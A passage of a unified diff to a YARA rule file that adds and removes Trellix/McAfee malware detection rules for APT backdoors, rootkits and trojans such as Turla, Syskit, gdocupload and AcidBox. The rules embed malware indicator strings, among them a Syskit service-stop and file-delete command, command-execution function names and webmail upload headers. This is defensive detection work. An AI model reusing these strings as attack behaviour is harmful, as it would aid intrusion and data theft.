-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_turla_pdb.yar#L1-L25"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122"
-		logic_hash = "d519317c936a38f189bf0de908902ec4e3e079c8c7463c8881ceb332c0a82a26"
-		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Turla"
-		actor_type = "Apt"
-		actor_group = "Unknown"
-
-	strings:
-		$pdb = "\\Workshop\\Projects\\cobra\\carbon_system\\x64\\Release\\carbon_system.pdb"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 650KB and any of them
-}
 rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi : BACKDOOR FILE
 {
 	meta:
@@ -145138,104 +145317,35 @@ rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Linux_Strings : BACKDOOR FILE
 	condition:
 		uint32( 0 ) == 0x464C457F and filesize < 200KB and ( ( 1 of ( $a* ) and 4 of ( $b* ) ) or ( 1 of ( $a* ) and 1 of ( $c* ) ) or 2 of ( $a* ) or all of ( $b* ) )
 }
-rule TRELLIX_ARC_Karkoff_Dnspionaje : BACKDOOR FILE
-{
-	meta:
-		description = "Rule to detect the Karkoff malware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "a5cdc65f-3a4c-5d97-9d88-8d60b14dfb9a"
-		date = "2019-04-23"
-		modified = "2020-08-14"
-		reference = "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_karkoff_dnspionaje.yar#L1-L30"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "5b102bf4d997688268bab45336cead7cdf188eb0d6355764e53b4f62e1cdf30c"
-		logic_hash = "79dd0087f1197cb1b2cd98416302363951479ba5ebf82289768585b56ed21c3a"
-		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Karkoff"
-		actor_type = "Apt"
-		actor_group = "Unknown"
-
-	strings:
-		$s1 = "DropperBackdoor.Newtonsoft.Json.dll" fullword wide
-		$s2 = "C:\\Windows\\Temp\\MSEx_log.txt" fullword wide
-		$s3 = "DropperBackdoor.exe" fullword wide
-		$s4 = "get_ProcessExtensionDataNames" fullword ascii
-		$s5 = "get_ProcessDictionaryKeys" fullword ascii
-		$s6 = "https://www.newtonsoft.com/json 0" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
-}
-rule TRELLIX_ARC_Ixeshe_Bled_Malware_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Hikit_Rootkit : ROOTKIT FILE
 {
 	meta:
-		description = "Rule to detect Ixeshe_bled malware based on PDB"
+		description = "Rule to detect the rootkit hikit based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "93356eab-5bb3-5b85-acc6-9a247554aa2d"
-		date = "2012-05-30"
+		id = "c53acbc6-8f4a-590b-8dd7-ce4da6d79cf8"
+		date = "2012-08-20"
 		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0015/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/ixeshe_bled_pdb.yar#L1-L24"
+		reference = "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_hikit_rootkit_pdb.yar#L1-L28"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "d1be51ef9a873de85fb566d157b034234377a4a1f24dfaf670e6b94b29f35482"
-		logic_hash = "7d2ce7644e25a56c101c148a32f7b0f7c3185c0c17f4d65eaef257f6ac7f8ffb"
+		logic_hash = "8a425ababdfbe95bd8ac7d4f519be16c0f1fd0b7eea2874124db2f00dd6eb56d"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
-		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Ixeshe"
-		actor_type = "Apt"
-		actor_group = "Unknown"
-
-	strings:
-		$pdb = "\\code\\Blade2009.6.30\\Blade2009.6.30\\EdgeEXE_20003OC\\Debug\\EdgeEXE.pdb"
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
-}
-rule TRELLIX_ARC_Apt_Babar_Malware : BACKDOOR FILE
-{
-	meta:
-		description = "Rule to detect Babar malware"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "3cbb63ce-ff93-51ee-93aa-2594fa1f8dad"
-		date = "2015-02-18"
-		modified = "2020-08-14"
-		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_babar_pdb.yar#L1-L35"
-		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c72a055b677cd9e5e2b2dcbba520425d023d906e6ee609b79c643d9034938ebf"
-		logic_hash = "02acef92691caed4573b609c111302427b9c27c5ef93f9199c52d75cb13e8615"
-		score = 75
-		quality = 45
-		tags = "BACKDOOR, FILE"
+		tags = "ROOTKIT, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Babar"
+		malware_type = "rootkit"
+		malware_family = "Rootkit:W32/Hikit"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "c:\\Documents and Settings\\admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper Release\\Release.pdb" fullword ascii
-		$s2 = "%COMMON_APPDATA%" fullword ascii
-		$s3 = "%%WINDIR%%\\%s\\%s" fullword ascii
-		$s4 = "/s /n %s \"%s\"" fullword ascii
-		$s5 = "/c start /wait " fullword ascii
-		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" fullword ascii
-		$s7 = "constructor or from DllMain." fullword ascii
-		$s8 = "ComSpec" fullword ascii
-		$s9 = "APPDATA" fullword ascii
-		$s10 = "WINDIR" fullword ascii
-		$s11 = "USERPROFILE" fullword ascii
+		$pdb = "\\JmVodServer\\hikit\\bin32\\RServer.pdb"
+		$pdb1 = "\\JmVodServer\\hikit\\bin32\\w7fw.pdb"
+		$pdb2 = "\\JmVodServer\\hikit\\bin32\\w7fw_2k.pdb"
+		$pdb3 = "\\JmVodServer\\hikit\\bin64\\w7fw_x64.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and any of them
 }
 rule TRELLIX_ARC_Apt_Mirage_Pdb : TROJAN FILE
 {
@@ -145266,593 +145376,725 @@ rule TRELLIX_ARC_Apt_Mirage_Pdb : TROJAN FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
 }
-
-rule TRELLIX_ARC_Milum_Trojan : TROJAN FILE
+rule TRELLIX_ARC_Ixeshe_Bled_Malware_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Milum trojan from the Wildpressure operation"
+		description = "Rule to detect Ixeshe_bled malware based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "acc56237-a93a-55c0-a90c-11ca1da683db"
-		date = "2020-04-24"
+		id = "93356eab-5bb3-5b85-acc6-9a247554aa2d"
+		date = "2012-05-30"
 		modified = "2020-08-14"
-		reference = "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_milum_wildpressure.yar#L3-L28"
+		reference = "https://attack.mitre.org/software/S0015/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/ixeshe_bled_pdb.yar#L1-L24"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
-		logic_hash = "3ab1ff129517cb4a829edac289c00d7701d6f667ba2ef5a28024fd01a3a52e8e"
+		hash = "d1be51ef9a873de85fb566d157b034234377a4a1f24dfaf670e6b94b29f35482"
+		logic_hash = "7d2ce7644e25a56c101c148a32f7b0f7c3185c0c17f4d65eaef257f6ac7f8ffb"
 		score = 75
 		quality = 70
-		tags = "TROJAN, FILE"
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Milum"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Ixeshe"
 		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????89??????????C7????????????8D????C7??????????33??6A??89??????????89????E8????????83????3B??0F84????????89????89??8B????89????8B????89????8B????C6??????8B????C6??????C6??????8B??????????BE????????89????89????88????C6??????6A??68????????8D??????????89??????????89??????????88??????????E8????????C6??????6A??538D????528D??????????89??????????89??????????88??????????E8????????C6??????8D??????????508B??E8????????508D??????????5157E8????????C6??????83????????????72??8B??????????52E8????????83????89??????????89??????????88??????????C6??????83????????????72??8B??????????50E8????????83????6A??68????????8D????89??????????89??????????88??????????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????83??????72??8B????51E8????????83????89????89????88????C6??????83??????72??8B????52E8????????83????6A??68????????8D????89????89????88????89????89????88????E8????????C6??????6A??538D????508D????89????89????88????E8????????C6??????83????8B??89??????????6A??89????89????68????????88??E8????????C6??????83????8B??89??????????6A??538D????89????89????5288??E8????????C6??????8D??????????50C6??????E8????????83????C6??????8B??????????2B??????????B8????????F7??03??C1????8B??C1????03??83????75??8B??????????6A??53528D????E8????????8B??????????6A??83????53508D????E8????????6A??538D????508D????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????BF????????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????8B??????????3B??74??8B??????????E8????????8B??????????50E8????????83????BF????????89??????????89??????????89??????????C6??????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????39????72??8B????50E8????????83????89????89????88????88????39????72??8B????51E8????????83????89????89????88????C7????????????39????72??8B????52E8????????83????8B??????????89????89????88????8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????8D??????????508D??????????89??????????E8????????C6??????C7??????????????????C6??????68????????8D??????????51E8????????CCCC558B??6A??68????????64??????????5051535657A1????????33??508D????64??????????8B????C7??????????C7????????????8D????33??83??????89????72??8B??EB??8B??8D????88??8B????8B????518B??E8????????8B????89????8B????89??8B????89????89????88????83??????72??8B??50E8????????83????89????C7????????????88??83????89????89????C7????????????8B????8B??50518D????E8????????89????8B????52E8????????83????8B????64????????????595F5E5B8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????505156A1????????33??508D????64??????????83????C7????????????8B????5156E8????????C7????????????C7????????????8B??8B????64????????????595E8B??5DC2????CCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????33??8B??89??????????8B????8B??89??????????89??????????89??????????3B??0F84????????8D????39??????????0F85????????68????????8D????5750E8????????C7????????????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????E9????????578D????68????????51E8????????C7????????????508D??????????52BA????????E8????????C6??????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????C6??????39??????????72??8B??????????50E8????????83????C7??????????????????89??????????88??????????88????39????72??8B????51E8????????83????C7????????????89????88????FF??????????38????75??8B????38????75??8B??8B??38????75??8D????8B??8B??38????74??EB??8B????38????75??3B????75??8B??8B????38????74??8B??8B??????????3B????0F85????????8B??????????8B??6A??5383????C7????????????89????508B??88??E8????????89????C7??????????????????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????C7????????????89????88????8B????64????????????595E5B8B??5DC3CCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????5356508D????64??????????33??89????538B??68????????8D????89????C7????????????89????88????E8????????C7????????????6A??8D????38????74??68????????EB??68????????E8????????8D????5083????8D????5651E8????????C6??????8D????52578B??E8????????83????C7????????????C6??????BE????????39????72??8B????50E8????????83????C7????????????89????88????88????39????72??8B????51E8????????83????C7????????????89????88????8B??8B????64????????????595E5B8B????33??E8????????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????F6??????C7????????????89????88????74??56E8????????83????8B??8B????64????????????595E5B8B??5DC2????CCCC558B??6A??68????????64??????????50A1????????33??508D????64??????????C7????????????6A??6A??8D????5083????E8????????C7????????????83??????72??8B????51E8????????83????C7????????????C7????????????C6??????8B????64????????????598B??5DC2????CCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????535657508D????64??????????33??89????8B????89????89????B8????????89????C7????????????89????88??89????8D????BF????????39????72??8B??8B????39????73??8D????8B????518D????518B??E8????????C6??????508B??E8????????C6??????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B??33??89????8B????89??????????89?????????? }
+		$pdb = "\\code\\Blade2009.6.30\\Blade2009.6.30\\EdgeEXE_20003OC\\Debug\\EdgeEXE.pdb"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and pe.imphash ( ) == "548d9f5f1e74f34b85612667335d41f2" and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and any of them
 }
-rule TRELLIX_ARC_Apt_Blackenergy_Pdb : TROJAN FILE
+
+rule TRELLIX_ARC_Syskit : FILE
 {
 	meta:
-		description = "Rule to detect the BlackEnergy trojan"
+		description = "SYSkit backdoor"
+		author = "Christiaan @ McAfee ATR"
+		id = "f06db38f-52d5-51b5-a17f-63e285dd5f80"
+		date = "2019-09-17"
+		modified = "2020-04-02"
+		reference = "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Tortoiseshell_Syskit.yar#L3-L40"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		logic_hash = "5b489d47d56de5c770b6ff6d6d56bf0fb87174f4a8428052b28fb392d9ac3f87"
+		score = 75
+		quality = 68
+		tags = "FILE"
+		hash1 = "07d123364d8d04e3fe0bfa4e0e23ddc7050ef039602ecd72baed70e6553c3ae4"
+		hash2 = "f71732f997c53fa45eef5c988697eb4aa62c8655d8f0be3268636fc23addd193"
+		hash3 = "02a3296238a3d127a2e517f4949d31914c15d96726fb4902322c065153b364b2"
+
+	strings:
+		$x1 = "timeout /t 10 & sc stop dllhost & timeout /t 10 & del C:\\Windows\\Temp\\BAK.exe" fullword wide
+		$s2 = "lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.R" ascii
+		$s3 = "C:\\Windows\\Temp\\rconfig.xml" fullword wide
+		$s4 = "Add-Type -AssemblyName System.IO.Compression.FileSystem" fullword wide
+		$s5 = "serviceProcessInstaller1" fullword ascii
+		$s6 = "    [System.IO.Compression.ZipFile]::ExtractToDirectory($zipfile, $outpath)" fullword wide
+		$s7 = "exec_cmd2" fullword ascii
+		$s8 = "exec_cmd" fullword ascii
+		$s9 = "send_command_result" fullword ascii
+		$s10 = "mycontent" fullword ascii
+		$s11 = "Diagnostic Server Host" fullword wide
+		$s12 = "bytesToBeEncrypted" fullword ascii
+		$s13 = "createPostRequest" fullword ascii
+		$s14 = "myhash" fullword ascii
+		$s15 = "DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5" ascii
+		$s16 = "circle_time" fullword ascii
+		$s17 = "ServiceStart_AfterInstall" fullword ascii
+		$s18 = "serviceInstaller1" fullword ascii
+		$s19 = "BAK.ProjectInstaller.resources" fullword ascii
+		$s20 = "Dll host" fullword wide
+		$op0 = { 96 00 f1 0a 57 02 05 00 34 25 }
+		$op1 = { 96 00 83 05 5a 01 0e 00 38 28 }
+		$op2 = { 06 00 00 11 28 4d 00 00 0a 02 6f 4e 00 00 0a 28 }
+
+	condition:
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and pe.imphash ( ) == "f34d5f2d4577ed6d9ceec516c1f5a744" and ( 1 of ( $x* ) and 4 of them ) and all of ( $op* ) ) or ( all of them )
+}
+rule TRELLIX_ARC_Apt_Gdocupload_Glooxmail : BACKDOOR FILE
+{
+	meta:
+		description = "Rule to detect gdocupload tool used by APT1"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "55c96b66-a8bf-5390-a75a-f3d2441c2a55"
-		date = "2013-02-15"
+		id = "deb20196-65e6-5dac-af0c-2f16e5926715"
+		date = "2013-02-19"
 		modified = "2020-08-14"
-		reference = "https://www.kaspersky.com.au/resource-center/threats/blackenergy"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_blackenergy_pdb.yar#L1-L38"
+		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_gdocupload_pdb.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "4b2efcda5269f4b80dc417a2b01332185f2fafabd8ba7114fa0306baaab5a72d"
-		logic_hash = "7bb85d03d8f2a4d91554f7fea96e9bbe36b153cfa4a91fd13fb99d41d430c9e9"
+		hash = "295c5c7aa5fa29628dec9f42ed657fce0bc789079c4e51932bcbc99a28dfd440"
+		logic_hash = "e016bb636af22fae79875bebaf1b4bd4f2a403e797d7ee52ea0691b4d7a54cf8"
 		score = 75
-		quality = 70
-		tags = "TROJAN, FILE"
+		quality = 45
+		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/BlackEngergy"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Gdocupload"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "msiexec.exe /i \"%s\" %s REBOOT=\"ReallySuppress\"" fullword wide
-		$s2 = "InstallUpdate: CreateProcess failed, Cmdline=%s Error=%d ." fullword wide
-		$s3 = "Portuguese=Instalando o Tempo de Execu" fullword wide
-		$s4 = "Initialization: Failed to initialize - Unable to get Upgrade Code." fullword wide
-		$s5 = "This version of Internet Explorer is not supported.  You should upgrade Internet Explorer to version %s and run setup again.  Se" wide
-		$s6 = "Initialization: Failed to open %s file, Make sure the file is not used by another process." fullword wide
-		$s7 = "o %s e execute a configura" fullword wide
-		$s8 = "Initialization: Failed to initialize - Unable to get Product Version." fullword wide
-		$s9 = "f:\\CB\\11X_Security\\Acrobat\\Installers\\BootStrapExe_Small\\Release\\Setup.pdb" fullword ascii
-		$s10 = "BootStrap.log" fullword wide
-		$s11 = "ACDownloaderDlg" fullword ascii
-		$s12 = "Initialization: Failed to initialize Product - msi key not specified." fullword wide
-		$s13 = "rio atualizar para o Service Pack %s e executar a instala" fullword wide
-		$s14 = "\\Msi.dll" fullword wide
+		$s1 = "https://www.google.com/accounts/ServiceLogin?service=writely&passive=1209600&continue=http://docs.google.com/&followup=http://do" ascii
+		$s2 = "Referer: http://sn114w.snt114.mail.live.com/mail/AttachmentUploader.aspx?_ec=1" fullword ascii
+		$s3 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET " ascii
+		$s4 = "e:\\Project\\mm\\Webmail\\Bin\\gdocs.pdb" fullword ascii
+		$s5 = "http://docs.google.com/?auth=" fullword ascii
+		$s6 = "x-guploader-client-info: mechanism=scotty flash; clientVersion=18067216" fullword ascii
+		$s7 = "http://docs.google.com/" fullword ascii
+		$s8 = "Referer: http://sn114w.snt114.mail.live.com/mail/EditMessageLight.aspx?n=%s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them
 }
-rule TRELLIX_ARC_Apt_Elise_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Lagulon_Trojan_Pdb : TROJAN FILE
 {
 	meta:
-		description = "Rule to detect Elise APT based on the PDB reference"
+		description = "Rule to detect trojan Lagulon based on PDB"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "cc8dd203-baad-5800-ba2c-f9c47d8ca6f0"
-		date = "2017-05-31"
+		id = "a31a465d-1f16-5c3e-a62d-ea15c11253c3"
+		date = "2013-08-31"
 		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0081/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_elise_pdb.yar#L1-L29"
+		reference = "https://www.cylance.com/operation-cleaver-cylance"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_lagulon_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "b426dbe0f281fe44495c47b35c0fb61b28558b5c8d9418876e22ec3de4df9e7b"
-		logic_hash = "bb7eee8082aa0f6634a8c4cdb9cbe0e2a7f00b97e48609c81a21bdaac64a5496"
+		hash = "e401340020688cdd0f5051b7553815eee6bc04a5a962900883f1b3676bf1de53"
+		logic_hash = "dad04c2deb990f253f952b768b74349dc9afb5f6db91ea3afff889f4c9f3230b"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "TROJAN, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Elise"
-		actor_type = "Cybercrime"
+		malware_type = "trojan"
+		malware_family = "Trojan:W32/lagulon"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\lstudio\\projects\\lotus\\elise\\Release\\EliseDLL\\i386\\EliseDLL.pdb"
-		$pdb1 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\SetElise.pdb"
-		$pdb2 = "\\lstudio\\projects\\lotus\\elise\\Release\\SetElise\\i386\\SetElise.pdb"
-		$pdb3 = "\\LStudio\\Projects\\Lotus\\Elise\\Release\\Uninstaller.pdb"
-		$pdb4 = "\\lstudio\\projects\\lotus\\evora\\Release\\EvoraDLL\\i386\\EvoraDLL.pdb"
+		$pdb = "\\proj\\wndTest\\Release\\wndTest.pdb"
 
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 50KB and any of them
 }
-rule TRELLIX_ARC_Apt_Gauss_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_APT_Acidbox_Kernelmode_Module : KERNELDRIVER FILE
 {
 	meta:
-		description = "Rule to detect Gauss based on PDB"
+		description = "Rule to detect the kernel mode component of AcidBox"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "209223cc-16e5-5596-8744-21ad71b5ec2a"
-		date = "2012-08-14"
+		id = "80b60307-5431-5f21-9e6f-06adaab0519d"
+		date = "2020-07-24"
 		modified = "2020-08-14"
-		reference = "https://securelist.com/the-mystery-of-the-encrypted-gauss-payload-5/33561/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/gauss_pdb.yar#L1-L25"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "7b0d0612b4ecc889a901115c2e77776ef0ea65c056b283d12e80f863062cea28"
-		logic_hash = "cb20c87ea976f395e000f2c631ffd52b09dca2af37adceafe5be72b37f75a997"
+		logic_hash = "e39da89d0da22115ac7889bc73ff183973a6c5334e304df955362bde76694d42"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "KERNELDRIVER, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Gauss"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		malware_type = "kerneldriver"
+		malware_family = "Rootkit:W32/Acidbox"
+		actor_type = "APT"
+		actor_group = "Turla"
+		hash1 = "3ef071e0327e7014dd374d96bed023e6c434df6f98cce88a1e7335a667f6749d"
 
 	strings:
-		$pdb = "\\projects\\gauss\\bin\\release\\winshell.pdb"
+		$pattern_0 = { 897c2434 8978b8 8d5f28 448bc3 33d2 }
+		$pattern_1 = { 4c8d842470010000 488d942418010000 498bcf e8???????? 8bd8 89442460 }
+		$pattern_2 = { 4c8bf1 49d1eb 4585c9 0f88a2000000 440fb717 498bd0 }
+		$pattern_3 = { ff15???????? 4c8d9c2480000000 498b5b10 498b7318 498b7b20 4d8b7328 498be3 }
+		$pattern_4 = { 33d2 41b8???????? 895c2420 e8???????? }
+		$pattern_5 = { 895c2420 4885ff 0f8424010000 440f20c0 84c0 0f8518010000 }
+		$pattern_6 = { 85f6 0f8469fdffff 488d8424c8010000 41b9???????? }
+		$pattern_7 = { 894c2404 750a ffc7 893c24 41ffc3 ebcb 85c9 }
+		$pattern_8 = { 488b5c2450 488b742458 488b7c2460 4883c430 }
+		$pattern_9 = { 33d2 488b4c2428 e8???????? 448b842450040000 4503c0 4c8d8c2450040000 488bd7 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 550KB and any of them
+		7 of them and filesize < 78848
 }
-rule TRELLIX_ARC_Apt_Flamer_Pdb : BACKDOOR FILE
+rule TRELLIX_ARC_APT_Acidbox_Main_Module_Dll : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect Flamer based on the PDB"
+		description = "Rule to detect the Main mode component of AcidBox"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "3bbe043d-c0dc-5aa2-b985-800a6d9038fd"
-		date = "2012-05-29"
+		id = "8c9beb0f-62f7-5788-8340-0b1ecdf54253"
+		date = "2020-07-24"
 		modified = "2020-08-14"
-		reference = "https://www.forcepoint.com/ko/blog/x-labs/flameflamerskywiper-one-most-advanced-malware-found-yet"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/flamer_pdb.yar#L1-L25"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L34-L65"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "554924ebdde8e68cb8d367b8e9a016c5908640954ec9fb936ece07ac4c5e1b75"
-		logic_hash = "3c1d3d015e086cff1f3d5add39397d8ed251b12144b31d8547165cbd0217735c"
+		logic_hash = "db98e204742b8629074d47df301ffcbb2dfb977a4da91557fb50838aae79e777"
 		score = 75
 		quality = 70
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Flamer"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		malware_family = "Backdoor:W32/Acidbox"
+		actor_type = "APT"
+		actor_group = "Turla"
+		hash1 = "eb30a1822bd6f503f8151cb04bfd315a62fa67dbfe1f573e6fcfd74636ecedd5"
 
 	strings:
